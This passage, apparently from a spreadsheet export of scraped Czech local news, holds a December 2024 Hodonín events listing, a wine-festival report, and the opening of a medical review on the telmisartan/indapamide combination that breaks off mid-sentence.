16.00 Pro zájemce od 15 let. Cyklus výtvarných dílen věnovaných ornamentu pod vedením lidové malérečky Kamily Bartálové. Tento první workshop bude zaměřen na základy malování ornamentu regionu Podluží, který si i sami vyzkoušíte při zdobení vánočních ozdob. Cena 200 Kč, rezervace přes e-mail kosutkova@gvuhodonin.cz. HANDS ON rodinné výtvarné dílny pro nejmenší návštěvníky Pro děti od 2 do 7 let s doprovodem galerie nově připravila kreativní dopolední aktivity v délce 60–90 minut. Střídají se dny zaměřené na různé výtvarné techniky HANDS ON ART a dny se čtením pohádek a tvořením HANDS ON BOOK. Všechny informace a termíny jsou zveřejněny na webu. Tak přijďte s dětmi tvořit pod vedením edukátorky – rezervace přes e-mail kosutkova@gvuhodonin.cz, cena: 100 Kč dítě + 50 Kč sourozenec, doprovod zdarma. čtvrtek 12. 12. 2024 9.30–11.00 | HANDS ON ART | Vánoční dílna Dílna vánočních přáníček a malovaných dopisů. čtvrtek 19. 12. 2024 9.30–11.00 | HANDS ON BOOK | Kamishibai divadélko RUKAVICE Japonské slovo Kamishibai je u nás překládané jako papírové divadlo (kami=papír a shibai=divadlo). Zimní příběh „Rukavice“ o zvířátkách bude se svým divadlem vyprávět výtvarnice a autorka ilustrací Lenka Kamínková. Výstava | Cesta z Majoliky do Kameniny a zase zpět | Vladimír Groš | do 5. 1. 2025 Stačí jeden pohled na tvorbu Vladimíra Groše a hned je jasné, že v sobě hravost rozhodně nezapře. Tento keramik a sochař rád provokuje, nešetří vtipem ani nadsázkou, s oblibou si pohrává se slovy a pohybuje se až na hranici grotesky. Důkazem je i několik figurálních plastik na této výstavě v galerii. Mezi jeho díly se ale objevují také užitkové nádoby a další objekty jako například rozměrné kameninové motory. Výstava | LAND/SCAPE | Veronika Remak Molatová | do 5. 1. 2025 Fascinující krajinomalba Veroniky Remak Molatové se v galerii nachází v levém výstavním sále na výstavě, která na první pohled zaujme neobvyklou instalací s balíky slámy. Objevují se zde díla jak ze staršího období této malířky, které se přiklání k hyperrealistické malbě, tak z období současného, kde krajina díky chvějivým tahům více směřuje do svébytného nového impresionismu autorky. Výstava | Jakub Nepraš | videosculpture | do 5. 1. 2025 Tento audiovizuální sochař prostřednictvím detailně propracovaných videí odráží stav společnosti, její chování a vývojové tendence, přičemž srovnání nachází právě v přírodních strukturách a procesech. Výsledkem jeho tvorby je i vystavený objekt v galerii, který může být vnímán nejen jako neutuchající hemžení organismů ve volné přírodě, ale také jako vícevrstvá metafora dotýkající se lidské společnosti a mezilidských vztahů. Lázně Hodonín Přehled kulturních akcí v Lázních Hodonín 2. prosince 2024 – pondělí od 11.00 do 17.00 Lázeňský vánoční jarmark Vánoční perníčky, čokoládové pralinky a jejich tvoření. Vinařství BARTONÍK – 100% hroznové mošty, džemy, želé. Háčkované hračky, svíčky, vonné vosky. Dekorace – ozdoby, vánoční andílci – příze – technika macramé. Strážnice – dárkové zboží, keramika, doplňky do bytu. Skleněné dekorace 2. prosince 2024 – pondělí 19.00 Divadelní soubor SVATOPLUK AKTOVKY 3. prosince 2024 – úterý od 14.30 do 15.30 Hrátky s pamětí – zábavné trénování s pamětí se zkušenou lektorkou M. ČEŠKOVOU 4. prosince 2024 – středa 19.00 KV BAND MIKULÁŠSKÁ ZÁBAVA 6. prosince 2024 – pátek 19.00 Zpívání a povídání s harmonikou Poslechový večer 7. prosince 2024 – sobota 19.00 OLD STARS BŘECLAV VÁNOČNÍ KOLEDY Scénky – Čertovská kletba, čertovská politika Poslechový večer 9. prosince 2024 – pondělí 19.00 Sourozenci BAŤKOVI Lidový vypravěč – L. KUBA 11. prosince 2024 – středa 19.00 MAGIC MELODY Taneční a poslechový večer 13. prosince 2024 – pátek 19.00 COUNTRY TULÁCI Taneční a poslechový večer 16. prosince 2024 – pondělí 19.00 DUO RUBÍN Taneční a poslechový večer Akce se konají v kulturním sále Lázní Hodonín Změna programu vyhrazena. Kontakt: kultura@laznehodonin.cz Provoz v lázních ukončen dne 19. 12. 2024. Zahájení provozu 7. 1. 2025. V provozu jsou denní lázně a krytý plavecký bazén Provozní doba denních lázní v prosinci PRODEJ VÁNOČNÍCH DÁRKOVÝCH VOUCHERŮ V RECEPCI DENNÍCH LÁZNÍ Do 22. prosince 2024 bude v Denních lázních běžná otevírací doba. WELLNESS ZÓNA (bazén, whirlpool, sauny a sprchy, Kneippova léčba, lokální hibernace, relaxační místnost a vstup na zelenou střechu) ve dnech: Pondělí až pátek 14.00–21.00 Víkendy a svátky 10.00–20.00 Cena za vstup do wellness zóny: 320 Kč/2 hodiny + doplatek 40 Kč/15 minut. V ceně je zahrnuto zapůjčení osušky. Do wellness zóny je povolen vstup dětem od 10 let nebo 150 cm v doprovodu a za stálého dozoru zákonného zástupce nebo odpovědné osoby starší 18 let. PLAVÁNÍ Úterý, středa, pátek 12.00–14.00 Cena za plavání: 160 Kč/ 1 hodina + 15 minut na převlečení, doplatek 40 Kč/15 minut. V ceně není zahrnuto zapůjčení osušky ani prostěradla. Na plavání povolen vstup dětem od 5 let pouze v doprovodu a se stálou kontrolou zákonného zástupce nebo odpovědné osoby starší 18 let. Provozní doba Denních lázní o vánočních svátcích Wellnesss zóna/2hodiny Fitness Datum SUCHÁ MASÁŽNÍ VANA 23. 12. 2024 10–20 hod. 24. 12. 2024 ZAVŘENO 25. 12. 2024 ZAVŘENO 26. 12. – 30. 12. 10–20 hod. 31. 12. 2024 ZAVŘENO 1. 1. 2025 ZAVŘENO 2. 1. 2025 10–20 hod. 3. 1. 2025 10–20 hod. Kontakt: Denní lázně Hodonín , Měšťanská 140, 695 01 Hodonín , telefon: 518 395 506, e-mail: spa@laznehodonin.cz, www.laznehodonin.cz, najdete nás také na facebooku. Krytý plavecký bazén má provozní dobu včetně saun zveřejněnu na webu: www.laznehodonin.cz/kryty-bazen/ rozvrh-hodin-plavani. Zavřeno je pouze 24. a 25. 12., 31. 12. 2024 a 1. 1. 2025 stejně jako v Denních lázních. Centrum pro rodinu a sociální péči Hodonín , z. s. Štefánikova 15, Hodonín , www.cprhodonin.cz Rodina a děti Herna: PO–PÁ 9.00–12.00; 14.00–18.30 Vánoční prázdniny: dovolená 23. 12. 2024 – 3. 1. 2025 Pro rodiče a děti: Vánoční ladění 12. 12. v 15.30–18.30 workshop malování perníčku s perníkářkou Ivetou Redkovou spojený s dalším vánočním tvořením v pohodové vánoční atmosféře. Informace: kocvarova@cprhodonin.cz, 720 410 988 a komosna@cprhodonin.cz, 720 410 988 Poselství Malého prince 3. 12. v 16.00–19.00: seminář inspirovaný tématikou knihy Malý princ s přesahem do výchovy děti s lektorkou Hanou Švandelkovou. Vhodné pro rodiče, učitele a děti od 7 let. Informace: dolezalova@cprhodonin.cz Fyzioterapie pro rodiče s dětmi od narození: na individuální konzultace se můžete objednávat na tel. čísle 736 724 146 (možno psát SMS), příp. na emailu pakostova@seznam.cz Děti a mládež Kouzelný vánoční den 14. 12.: Den plný vánočních aktivit pro děti od 7 do 12 let. Upečeme si vánoční cukroví, vytvoříme dekorace, pobavíme se o Vánocích. Informace: zalesakova@cprhodonin.cz, 602 632 943. Bližší informace a přihlášky budou na webu i Facebooku. Rodičovství Rozvoj dětských schopností a dovedností 12. 12. v 9.30: setkání s lektorkou Soňou Tomíkovou. Průvodce výchovou: individuální poradenství pro rodiče s lektorkou Soňou Tomíkovou. Termín si domluvte telefonicky na 737 832 333. Průvodce neklidem: vždy před setkáním skupiny o neklidných dětech, popř. online. Termín si domluvte na emailu dolezalova@cprhodonin.cz Manželé a páry Prodej nedatovaných kalendářů Partnerský kompas. Informace: www.partnerskykompas.cz, 774 650 133. Základní sociální poradenství, individuální, rodinná a párová terapie, mediace. Informace: zalesakova@cprhodonin.cz, 602 632 943. Odborné služby pro rodiny Máme volnou kapacitu k uzavírání dohod o výkonu pěstounské péče: doprovázení, podpora a vzdělávání pěstounů a svěřených i biologických dětí. Nabídka psychoterapie (párová, rodinná, individuální, pro děti), mediace (vedena jedním či dvěma mediátory) v online prostředí nebo osobně. Individuální poradenství pro děti v bezpečném a důvěrném prostředí. Asistované předávání a kontakty. Poradenství pro dospělé při rozchodu a rozvodu rodičů, ale i v jakýchkoliv jiných nesnázích. Doprovázení rodiče po odebrání dítěte a rodiče, který nemá své dítě v péči. Informace: zalesakova@cprhodonin.cz, 602 632 943. Vzdělávací centrum pod Centrem pro rodinu Akreditované vzdělání pro sociální pracovníky, pracovníky v sociálních službách, ale i veřejnost. Nabídku naleznete na webových stránkách. Informace: zalesakova@cprhodonin.cz, 602 632 943. Připravujeme 2025 leden: Zdravé vztahy: setkání s lektorkou Soňou Tomíkovou. Trénink sociálních a emočních dovedností dítěte s ADHD: trénink pozornosti, koncentrace a paměti: setkání s lektorkou Markétou Librovou. Komunikace s nejmenšími: kurzy znakování s lektorkou Pavlínou Spurnou. Zapojení prarodičů do výchovy a života dítěte: setkání s lektorkou Soňou Tomíkovou. Karneval 6. 2. v 15.30–18.30 Kostýmová zábava pro děti i rodiče Regionální centrum Hodonín Vánoční výstava betlémů Výstava bude probíhat od 3. 12. do 21. 12. Možné navštívit během otevírací doby úterý–sobota Zveme vás na procvičení mozku s paměťáři Těšíme se na vás každou středu od 15 do 16 hodin Regionální centrum města Hodonína Úspěšný boj s pamětí Na zapomínání a podobné všelidské problémy si stěžují lidé v každém věku, rozhodně to není jen problém seniorů. Paměť je potřeba pravidelně provětrávat, mozek namáhat a vhodně zatěžovat, jako ostatně každý tělesný orgán, a to nejlépe pod odborným vedením. Jednou takovou aktivitou jsou i zábavné kurzy v hodonínském Regionálním centru na Masarykově náměstí, kde se zájemci o trénování své dlouhodobé i krátkodobé paměti schází každou středu od 15 do 16 hod. Pod vedením Mgr. Zdeňka Gloze zde skupinka stejně zaměřených nadšenců (převládají ženy) procvičuje nad zadávanými problémy a hádankami svou „šedou kůru mozkovou“, jak obvykle říká detektiv Hercule Poirot v povídkách Agathy Christie . Docházka je dobrovolná, poplatek 50 Kč. Každý může přijít, když má právě čas a náladu. Na osobní péči o zlepšení pozornosti a koncentrace při řešení problémů, na předcházení poruchám paměti, na rozšiřování slovní zásoby atd., není nikdy pozdě. Zdenka Šolcová Český červený kříž oblastní spolek Hodonín Český červený kříž oblastní spolek Hodonín ve spolupráci s Městskou knihovnou Hodonín zve své členy a další příznivce na akci Nové léčebné a vyšetřovací metody v Nemocnici TGM Hodonín Dne 10. prosince 2024 v 15.00 v přednáškovém sále Městské knihovny Program: SEXTETO PLUS – pěvecký sbor přivítá blížící se vánoční svátky MUDr. Černý – náměstek ředitele pro zdravotní péči Diskuze Všichni jsou srdečně zváni! Výbor Českého červeného kříže , oblastního spolku Hodonín Senioři ČR, z. s., Hodonín Senioři ČR, z. s., městská organizace Hodonín Horní Valy 2, tel. 518 340 147 Úřední hodiny v úterý 9.00–12.00 Právní poradna JUDr. Račické pro velký zájem pokračuje, objednání zprostředkuje ing. Polášek na výše uvedeném tel. čísle. Každé pondělí přátelské posezení v klubovně seniorů od 15.00. Každé úterý sportovní hry našem sídle od 14.00. Každé středeční odpoledne jsou v klubovně seniorů hudební zkoušky sboru Sexteto Plus. 5. 12. ve 14 hod. se koná posezení při svíčkách za účasti Sexteta Plus v klubovně seniorů, připravuje p. Zipperová Připravujeme na rok 2025: 31. 8. – 6. 9. 2025 pobytový zájezd do Slovinska . Bližší informace budou uvedeny v lednových Hodonínských listech. Připravuje p. Stahalová. Městská knihovna Hodonín Národní třída 36 – tel.: 518 321 213, 724 055 952 • pobočka Brandlova 81 – tel.: 518 321 212 , 725 965 653 • www.knihovnahod.cz Důležité upozornění V budově knihovny na Národní třídě stále probíhá rekonstrukce. Dodržujte prosím bezpečnostní pokyny a dbejte zvýšené opatrnosti. Děkujeme za pochopení a těšíme se na vaši návštěvu. VÁNOČNÍ OTEVÍRACÍ DOBA Pondělí 23. 12. 8.30–17.00 Pátek 27. 12. 8.30–17.00 Pondělí 30. 12. 8.30–17.00 Úterý 31. 12. ZAVŘENO Pobočka Brandlova uzavřena v období 23. 12. – 31. 12. Městská knihovna Hodonín přeje všem svým čtenářům a návštěvníkům příjemné a klidné prožití vánočních svátků. VÝSTAVNICTVÍ 30. 11. – 4. 1. 2025 / Jiří Mašek, junior / ALFA BETA GAME / Galerie Vednevnoci Grafický designer Jiří Mašek představí v Galerii Vednevnoci svou volnou vizuální tvorbu. Hra kompozice a skrytých významů. Jednotlivé kusy tvorby lze číst jako krátké zprávy od autora. Klíčová slova: tvar, prostor, kontrast, barva. 30. 11. – 31. 12. / Výstava výtvarných prací z projektu Od A do Zet Ivony Březinové / Plácek a Výstavní sál Děti tvořily návrh obálky libovolné knihy spisovatelky Ivony Březinové nebo koláž z obálek a návrhů knih. Přijďte se podívat, jak se jim to povedlo. AKCE Úterý 3. 12. / Ruská kosmonautika na sestupné dráze Seznam vesmírných prvenství dosažených Sovětským svazem, jehož je Rusko nástupcem, je obdivuhodný. Jenže z minulosti se donekonečna žít nedá. A právě ruská kosmonautika dnes zažívá nevídaný pád z výsluní. Jak vypadá a kde se zastaví? Přednáší Ing. Tomáš Přibyl, kurátor letectví a kosmonautiky Technického muzea v Brně . 17.00 / Přednáškový sál Úterý 3. 12. / Václav Černý a jeho doba – 60. léta Bonusová lekce nejen pro účastníky kurzu PhDr. Waltera Bartoše . Václav Černý jako klíčová postava české intelektuální scény, především svými přednáškami a veřejným působením na Filozofické fakultě Univerzity Karlovy. 16.00–17.00 / Zasedací sál Čtvrtek 5. 12. / SONS poradenství pro zrakově postižené Odborné poradenství poskytne sociální pracovnice SONS Kyjov Hana Vrtková. 10.00–12.00 / ProSenior Pondělí 9. 12. / Atlas starých stezek a cest na území ČR Přednášející RNDr. Miroslav Sedláček bude hovořit o starých stezkách, od Keltů přes Římany a Velkou Moravu do začátku novověku. Představí unikátní publikaci Atlas starých stezek a cest na území ČR autora Radana Květa. 17.00 / Přednáškový sál Úterý 10. 12. / Červený kříž – nové léčebné a vyšetřovací metody v nemocnici Hodonín Červený kříž Hodonín představí veřejnosti nové metody, které nabízí nemocnice Hodonín . 15.00 / Přednáškový sál Úterý 10. 12. / Václav Černý a jeho doba – Období normalizace Bonusová lekce nejen pro účastníky kurzu PhDr. Waltera Bartoše . Přednáška se věnuje období normalizace, vyloučení Václava Černého z univerzity, seznamu zakázaných osob a Václavu Černému jako významnému signatáři Charty 77. 16.00–17.00 / Zasedací sál Úterý 10. 12. / Babské rady Moderátorka Jarka Vykoupilová z Českého rozhlasu Brno vás seznámí se spoustou rad a tipů, jak vše v domácnosti spotřebovat a využít. 18.00 / Přednáškový sál Středa 11. 12. / Vánoční koncert Sexteta Plus Vystoupení hodonínského uskupení Sexteto Plus. Zazpívají písně s námětem světským i církevním. 16.30 / Přednáškový sál Středa 11.12. / Regions of the US / Cultural Divides with Blair Anglická konverzace o regionech USA a kulturních rozdílech. 17.00–18.00 / Zasedací sál Čtvrtek 12. 12. / Workshop „Vánoční nepečené cukroví zdravě“ S lektorkou Dagmar Sedlářovou se naučíte, jak jednoduše a chutně připravit vánoční cukroví s minimem cukru. Vyzkoušíte si, jak kreativně improvizovat při tvorbě nepečeného cukroví a dozvíte se, proč je právě toto cukroví zajímavé z pohledu výživy. Maximální počet účastníků 12. Přihlašovat se můžete přes webový formulář na stránkách knihovny. 16.00 / Zasedací sál Středa 4. 12. / 18. 12. / Čeština pro cizince 15.30–16.30 začátečníci a 16.30–18.00 mírně pokročilí. Lektorka Mgr. Jana Lamačová. Zasedací sál Středa 11. 12. / Čeština pro cizince 15.30–16.30 začátečníci a 16.30–18.00 mírně pokročilí. Lektorka Mgr. Jana Lamačová. Klidová zóna Není-li uvedeno jinak, vstupné zdarma. Změna programu vyhrazena. DĚTSKÉ ODDĚLENÍ A ZAŠÍVÁRNA Pátek 6. 12. / Vánoční dílnička Přijďte si v předvánočním čase vyrobit barevné papírové vánoční ozdoby zdobené korálky . Povede vás nápaditá lektorka Milada Češková. 14.00–16.00 / Přednáškový sál Čtvrtek 12. 12. / Škvrňata a batolata do knihovny natotata Pohádkování s Ingrid Nesvadbovou v rámci celorepublikového projektu Bookstart aneb S knížkou do života. 9.00–9.30 a 10.00–10.30 / Oddělení pro děti Každý pátek / Deskové hry pro děti Hrajete rádi deskové hry? Chcete potkat nové kamarády a spoluhráče, vyzkoušet něco nového? Využijte možnost zahrát si deskovku. Věková hranice 8+, mladší děti s doprovodem. 14.00–16.30 / Oddělení pro děti Klub CoderDojo Máš 7–17 let a baví tě programování? Přijď se podívat do našeho klubu CoderDojo. Přihlašovat se můžete průběžně, přihlášku najdete na našich webových stránkách nebo přímo v knihovně v Oddělení pro děti nebo na Pobočce Brandlova. Přihlášku vyplňte a vezměte si ji s sebou do knihovny. Středa 11. 12. / CoderDojo 3D tisk s Danielem Králem 16.00–18.00 / PC učebna Čtvrtek 12. 12. / CoderDojo Lekce programování a robotiky s Matyášem Vrňákem 16.00–18.00 / PC učebna Čtvrtek 5. 12. / 19. 12./ CoderDojo Audiovizuální koutek s Tomášem Theuerem 16.00–18.00 / PC učebna ProSenior Pondělí 2. 12. / 9.12. / 16.12. / Cvičení Tai Chi pro pokročilé Informace na telefonu: 772 269 843. 18.00–19.00 / Oddělení pro dospělé Úterý 3. 12. a 17. 12. / Hrátky s pamětí Tradiční procvičování mozkových závitů v podání lektorky Milady Češkové. 9.30–10.30 / Zasedací sál Každé úterý a čtvrtek / Deskové a karetní hry Přijďte si zahrát karetní a deskové hry do knihovny. 10.30–13.30 / ProSenior Čtvrtek 5. 12. / 12. 12. / 19. 12. / Cvičení na židli a u židle Protahovací a posilovací cvičení s prvky Tai Chi a Čchi-Kung. 9.30–10.30 / Zasedací sál Spolek zdravotně postižených občanů ZO č. 1 Hodonín NA ROK 2025 PŘIPRAVUJEME 13. 2. – členská schůze + společenské setkání 22. – 26. 4. – pobyt Luhačovice 15. – 20. 6. – pobyt Jablonec nad Nisou 8. - 16. 7. – pobyt Chorvatsko Rabac 8. – 13. 9. – pobyt Plzeň a okolí 14. – 17. 10. – termály Velký Medér Od ledna 2025 otevíráme kancelář v ulici Palackého 14, každý čtvrtek 9–11 hodin. Spolek zdravotně postižených občanů ZO č. 2 Hodonín NA ROK 2025 PŘIPRAVUJEME PRO SVÉ ČLENY NÁSLEDUJÍCÍ REKONDICE: 1. Spa Resort, Lednice – neděle 6. 4. – pátek 11. 4. 2025, 2. Hotel Fit, Maďarsko , Hevíz – neděle 25. 5. – sobota 31. 5. 2025, 3. zájezd Chorvatsko / Istrie / Rabac – chatový areál Oliva 26. 8. – 3. 9.2025 – chatka pro 4 (dvě ložnice, spol. kuchyň, sprchy a WC), chatka pro 2 (samost. kuchyň, sprcha, WC). Od úterý 3. 12. a 10. 12. od 9.00 prodej zájezdů na Palackého 14, Hodonín . Vyřizuje: Strnadová Soňa Spolkový výbor SZPO Hodonín REKONDIČNÍ POBYTY NA ROK 2025 30. 4. – 5. 5. 2025 Rekr. zařízení Vyhlídka, Češkovice Rekreační zařízení Vyhlídka se nachází dva kilometry nad městem Blanskem v rekreační oblasti Češkovice, obklopené krásnou lesnatou přírodou Moravského krasu s výhledem do dalekého okolí. Oblast Moravského krasu je považována za jedno z nejkrásnějších míst Jižní Moravy a za ráj s mnoha přírodními, historickými i technickými poklady. V ceně doprava, ubytování, plná penze, výlety do okolí. 18. 5. – 23. 5. 2025 Hotel Jesenice, Jesenice Hotel se nachází nedaleko Rakovníka . Poblíž se nachází hrad Křivoklát , zámek Lány a jiné. Pokoje jsou vybaveny vlastním sociálním zařízením a satelitní televizí. V ceně doprava, ubytování, plná penze. Výlety do okolí. 9. 6. – 14. 6. 2025 Hotel Praha , Broumov Hotel Praha Broumov poskytuje ubytování návštěvníkům Broumova už přes 400 let. Sídlí na náměstí v památkově chráněné budově s okouzlujícími interiéry. Hned za městem začíná území přírodní rezervace Broumovské stěny, za 20 minut dojedete autem do Adršpašsko -teplických skal. Jeho součástí je kavárna s barem a venkovní terasou. Jedná se o pobytovou rekondici s plnou penzí a výlety do okolí. 20. 7. – 25. 7. 2025 Hotel PAX, Trenčianské Teplice – Slovensko Hotel se nachází v centru města blízko lázeňského parku. V ceně: doprava, ubytování ve dvoulůžkových pokojích, lékařská prohlídka, dvě procedury denně, plná penze formou bufetu, třikrát vstup do bazénu Grand. 11. 8. – 16. 8. 2025 Hotel MAS, Sezimovo Ústí , Lázeňský pobyt, ubytování ve dvojlůžkových pokojích, plná penze bufetových způsobem, čtyři procedury, dvakrát společenský večer s živou hudbou, jedenkrát společenská hra bingo, neomezený vstup do hotelového vyhřívaného bazénu, půldenní výlet do Tábora , možnost zakoupení výletů do okolí. 4. 9. – 11. 9. 2025 Hotel Méditerranée Thalasso Golf, Tunisko Příjemný klubový hotel Méditerranée Thalasso Golf postavený v maurském stylu se skládá z hlavní budovy a postranních dvoupatrových bungalovů umístěných v tropické zahradě s přímým přístupem na dlouhou písčitou pláž. Hostům nabízí venkovní bazén, wellness, fitness. V ceně doprava z Hodonína na letiště do Brna a zpět, stravování All INCLUSIVE, cestovní pojištění. Každý čtvrtek od 13.00 do 14.00 si mohou naši členové udržovat tělesnou kondici plaváním v městském krytém plaveckém bazénu. Vstup po předložení členské legitimace zdarma. Přihlášky na výše uvedené rekondiční pobyty přijímáme od 8. ledna 2025 od 8.00 se zálohou 2 000 Kč (u leteckého zájezdu 4 000 Kč) a každou další středu od 9.00 do 12.00 hodin na Palackého ulici č. 14 do vyčerpání kapacity. Bližší informace osobně každou středu nebo telefonicky ve stejnou dobu na čísle 518 352 544, 727 860 475, email SVSZPO@seznam.cz. Do roku 2025 Spolkový výbor SZPO přeje všem naším členům hodně zdraví a osobních úspěchů. Ing. Petr Kokeš – předseda SV SZPO Marie Černá , hospodář</t>
  </si>
  <si>
    <t>20241201_282_3474586100_c560d4411a5ffc51e654.html</t>
  </si>
  <si>
    <t>c560d4411a5ffc51e654</t>
  </si>
  <si>
    <t>Svatomartinské slavnosti nabídly rekordní počet vzorků vín</t>
  </si>
  <si>
    <t>Svatomartinské slavnosti nabídly rekordní počet vzorků vín Odbitím 11. hodiny začaly 9. listopadu na Masarykově náměstí Svatomartinské slavnosti. Devět vinařství z Hodonínska a Podluží nabídlo rekordní počet vzorků mladých vín z letošní sklizně. K tomu byla připravena bohatá nabídka občerstvení nejen v hlavním stanu, ale také na přilehlém svatomartinském trhu regionálních produktů. Za město Hodonín akci zahájil místostarosta Ondřej Fialík. Z občerstvení nechyběla například oblíbená kachna se zelím a bramborovým knedlíkem či regionální speciality. Zájmu veřejnosti se těšil i trh, kde své zboží a pochutiny letos prezentovalo 16 trhovců. Prim však hrála hlavně vína . Vinařská unie letos umožnila prodej svatomartinských vín již od 8. listopadu, sobota tak byla ideálním dnem pro představení jejich nabídky. „Máme tady rekordní počet jak vzorků, tak lahví. Celkem nabízíme 38 druhů vín a k dispozici máme 750 lahví,“ řekl za organizátory předseda Místní akční skupiny Jižní Slovácko Josef Smetana. Oblíbená akce se letos konala již po čtrnácté a stejně jako v předešlých letech se těšila velkému zájmu veřejnosti. Autor: -pk- Autor person pk</t>
  </si>
  <si>
    <t>20241201_283_3474501617_01b4654777108d58cfd8.html</t>
  </si>
  <si>
    <t>01b4654777108d58cfd8</t>
  </si>
  <si>
    <t>Možná úskalí v léčbě fixním preparátem telmisartan/indapamid (Ylpio®) a jejich praktická řešení</t>
  </si>
  <si>
    <t>Možná úskalí v léčbě fixním preparátem telmisartan/indapamid (Ylpio®) a jejich praktická řešení Rubrika: kardiologie Souhrn: Arteriální hypertenze je definovaná jako opakované zvýšení krevního tlaku nad 140/90mmHg naměřené v ambulanci při dvou různých návštěvách. Její prevalence je rostoucí a je spojena s častějším výskytem fibrilace síní, diastolické dysfunkce a rozvojem srdečního selhání se zachovalou ejekční frakcí, je druhou nejčastější příčinou selhání ledvin a vede k očnímu poškození. U mužů vede k erektilní dysfunkci. Prognóza nemocného s hypertenzí závisí na výši krevního tlaku, na přítomnosti dalších rizikových faktorů: aterosklerózy, orgánového postižení navozeného hypertenzí a přidružených onemocnění. Nefarmakologické možnosti léčby se opírají zejména o změnu životního stylu. Nicméně se často neobejdeme bez farmakologické léčby. Základem léčby jsou blokátory inhibitorů renin angiotensin aldosteronového systému. V dnešní době si často nevystačíme s monoterapií hypertenze a musíme použít kombinaci s dalším preparátem. Výhodná je kombinace blokátoru renin-angiotensinového systému (RAS) s diuretikem. Preferovaným diuretikem je indapamid. Možnými nežádoucími účinky této fixní kombinace jsou hypotenze, iontová dysbalance či erektilní dysfunkce u mužů. V případě, že na tyto možné komplikace myslíme a důkladně pacienta poučíme o jejich existenci a řešení, můžeme jim předcházet. Klíčová slova: arteriální hypertenze, cévní mozková příhoda, ischemická choroba srdeční, telmisartan, indapamid, hypokalémie, hypotenze, erektilní dysfunkce Úvod Arteriální hypertenze (AH) je definovaná jako opakované zvýšení krevního tlaku (TK) ≥ 140/90 mmHg naměřené v ambulanci při dvou různých návštěvách. Prevalence v České republice u osob ve věku 26–64 let se pohybuje okolo 50 % u mužů a 34 % u žen. Nárůst hypertenze je ve vyšším věku, u mladších převažují muži, ve starším věku nad 65 let postihuje častěji ženy. 20 % pacientů s hypertenzí o svém onemocnění neví. Cílových hodnot krevního tlaku dosahuje pouze jedna třetina hypertoniků (1). Spolu s kouřením, diabetem mellitem, dyslipidémií a obezitou je jedním z nejzávažnějších modifikovatelných rizikových faktorů kardiovaskulárních (KV) komplikací – cévních mozkových příhod ( CMP ), ischemických chorob srdečních (ICHS) a dalších projevů aterosklerózy. AH je spojena s častějším výskytem fibrilace síní, diastolické dysfunkce a rozvojem srdečního selhání se zachovalou ejekční frakcí. AH je druhou nejčastější příčinou selhání ledvin, vede k očnímu poškození (nejčastěji hypertenzní retinopatie, ale zhoršuje také diabetickou retinopatii). U mužů vede k erektilní dysfunkci (ED). Prognóza nemocného s hypertenzí závisí na výši TK, na přítomnosti dalších rizikových faktorů aterosklerózy, orgánového postižení navozeného hypertenzí a přidružených onemocnění. Nefarmakologické možnosti léčby se opírají zejména o změnu životního stylu. Většinou se však neobejdeme bez farmakologické léčby. V případě středně těžké a těžké hypertenze zahajujeme léčbu ihned nejlépe fixní dvojkombinací. U starších křehkých nemocných volíme buď monoterapii, nebo dvojkombinaci v nízkých dávkách. Další terapeutické kroky se provádějí v odstupu 4–6 týdnů po rozvinutí plného antihypertenzního účinku léků. Součástí léčby hypertenze je vždy léčba přidružených rizikových faktorů: cukrovky a dyslipidémie. Při volbě vhodné skupiny antihypertenziv se řídíme daty ze studií vyhodnocujících morbiditu, mortalitu a KV příhody. Základem léčby hypertenze jsou blokátory renin-angiotensinového systému (RAS). V dnešní době si často nevystačíme s monoterapií hypertenze a musíme použít kombinaci s dalším preparátem. Výhodná je kombinace blokátoru RAS s diuretikem. Telmisartan Telmisartan je selektivním antagonistou receptorů pro angiotensin II (AT1 receptoru) s nejvyšší afinitou k tomuto receptoru ze všech sartanů. Telmisartan je nejvíce lipofilní, což vede k vysoké tkáňové penetraci, má nejdelší biologický poločas umožňující jeho dávkování jednou denně a nejnižší podíl renálního vylučování, tedy u pacientů s mírnou renální insuficiencí není potřeba úprava dávky. Mezi další jeho přednosti při snižování hypertenze nadále patří renoprotektivní efekt zejména u diabetiků, zlepšuje endoteliální funkce a vykazuje kardioprotektivní účinky: redukuje hospitalizace z KV příčin a redukuje hypertrofii levé komory (2,3). Oproti preparátům ze skupiny ACE inhibitorů má mnohem menší incidenci suchého kašle a angioedému. Dalšími výhodami je metabolická příznivost: zlepšuje inzulinovou senzitivitu u pacientů s metabolickým syndromem a také zlepšuje lipidový profil (pokles LDL cholesterolu). Indapamid Indapamid je thiazidům podobné (thiazid-like) diuretikum s mírným diuretickým účinkem a mírným vazodilatačním účinkem, má studiemi prokázaný kardioprotektivní efekt: snižuje riziko kardiovaskulárních příhod, jako jsou infarkty myokardu a cévní mozkové příhody, až o 20 % ve srovnání s placebem (4). V porovnání s jinými diuretiky (zejména thiazidy) vykazuje nižší výskyt hypokalémie. Další jeho výhodou je metabolická příznivost: nezhoršuje metabolický profil pacientů s diabetem a může dokonce zlepšit inzulinovou senzitivitu u pacientů s metabolickým syndromem (5). Díky své dlouhé biologické dostupnosti je umožněno dávkování jednou denně. Indapamid má pozitivní vliv na funkci ledvin, některé studie s diabetiky prokázaly zlepšení renální perfuze a snížení progrese chronického onemocnění ledvin (6). Fixní kombinace telmisartanu s indapamidem kombinuje mechanismy účinku obou léků, ty působí synergicky, což přispívá k efektivnějšímu snižování krevního tlaku a zlepšení celkové kardiovaskulární morbidity a mortality. Výhodou této fixní kombinace je navíc zlepšení adherence k léčbě. Fixní kombinace vykazuje nižší incidenci hypokalémie oproti monoterapii thiazidovými diuretiky, nezhoršuje metabolický profil pacientů s diabetem a může dokonce zlepšit inzulinovou senzitivitu, má pozitivní vliv na funkci ledvin, může zlepšit renální perfuzi a snížit riziko vzniku renální insuficience, zejména u pacientů s diabetem. Potenciální nežádoucí účinky Léčba fixní kombinací telmisartanu a indapamidu, ačkoli má mnoho výhod, může také nést potenciální rizika a nežádoucí účinky. Jedním z hlavních potenciálních rizik je hypokalémie, která může být způsobena indapamidem, jakožto thiazid-like diuretikem, které zvyšuje vylučování draslíku. Fixní kombinace s telmisartanem, který naopak kalémii zvyšuje, vykazuje nižší incidenci hypokalémie než monoterapie indapamidem. Nicméně je dobré na hypokalémii myslet zejména u akutních stavů, jako je gastroenteritida, alkoholový exces, nadměrný příjem kofeinu a dále u chronických stavů při léčbě jinými, zejména kličkovými diuretiky, při snížení příjmu draslíku ve stravě. Další iontovou dysbalancí může být hyponatrémie a hypochloridémie. Rizikovou skupinou bývají zejména starší fragilní osoby, alkoholici a pacienti užívající psychofarmaka, zejména tricyklická antidepresiva, fenothiaziny, 